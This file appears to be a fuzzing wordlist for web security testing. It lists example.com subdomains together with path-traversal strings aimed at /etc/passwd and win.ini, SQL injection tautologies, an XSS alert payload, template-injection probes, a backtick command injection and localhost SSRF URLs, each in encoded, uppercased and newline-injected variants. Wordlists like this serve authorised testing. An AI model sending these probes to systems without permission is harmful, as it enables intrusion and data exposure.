unused.example.com
dev.example.com
staging.example.com
old.example.com
cdn.example.com
test
baseline
AUROSE_PROBE
../../../../etc/passwd
..\..\..\..\windows\win.ini
' OR '1'='1
" OR "1"="1
<script>alert(1)</script>
${7*7}
{{7*7}}
`id`
127.0.0.1
http://127.0.0.1
https://example.com
..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%5C..%5C..%5C..%5Cwindows%5Cwin.ini
%27%20OR%20%271%27%3D%271
%22%20OR%20%221%22%3D%221
%3Cscript%3Ealert%281%29%3C%2Fscript%3E
%24%7B7%2A7%7D
%7B%7B7%2A7%7D%7D
%60id%60
http%3A%2F%2F127.0.0.1
https%3A%2F%2Fexample.com
UNUSED.EXAMPLE.COM
DEV.EXAMPLE.COM
STAGING.EXAMPLE.COM
OLD.EXAMPLE.COM
CDN.EXAMPLE.COM
TEST
BASELINE
../../../../ETC/PASSWD
..\..\..\..\WINDOWS\WIN.INI
<SCRIPT>ALERT(1)</SCRIPT>
`ID`
HTTP://127.0.0.1
HTTPS://EXAMPLE.COM
..%2F..%2F..%2F..%2FETC%2FPASSWD
..%5C..%5C..%5C..%5CWINDOWS%5CWIN.INI
%3CSCRIPT%3EALERT%281%29%3C%2FSCRIPT%3E
%60ID%60
HTTP%3A%2F%2F127.0.0.1
HTTPS%3A%2F%2FEXAMPLE.COM
' OR '1'%3D'1
" OR "1"%3D"1
unused.example.com?v=0
unused.example.com&v=0
unused.example.com_0
subdomain_0
/subdomain/0
unused.example.com%0a0
dev.example.com?v=1
dev.example.com&v=1
dev.example.com_1
subdomain_1
/subdomain/1
dev.example.com%0a1
staging.example.com?v=2
staging.example.com&v=2
staging.example.com_2
subdomain_2
/subdomain/2
staging.example.com%0a2
old.example.com?v=3
old.example.com&v=3
old.example.com_3
subdomain_3
/subdomain/3
old.example.com%0a3
cdn.example.com?v=4
cdn.example.com&v=4
cdn.example.com_4
subdomain_4
/subdomain/4
cdn.example.com%0a4
